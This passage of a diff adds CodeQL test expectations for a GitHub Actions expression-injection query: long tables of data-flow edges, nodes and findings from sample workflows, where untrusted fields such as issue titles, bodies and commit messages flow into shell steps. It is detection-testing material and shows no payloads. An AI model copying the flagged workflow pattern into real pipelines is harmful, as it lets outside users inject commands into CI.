'$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... 
ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... 
age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... 
sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... 
ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref new file mode 100644 index 000000000000..1745587e534a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected new file mode 100644 index 000000000000..13c81bd08e0b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -0,0 +1,233 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... 
_url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... 
iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... 
title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... 
ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... 
iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... 
nch }}' | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... 
ail }}' | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +subpaths +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... 
tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... 
ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| 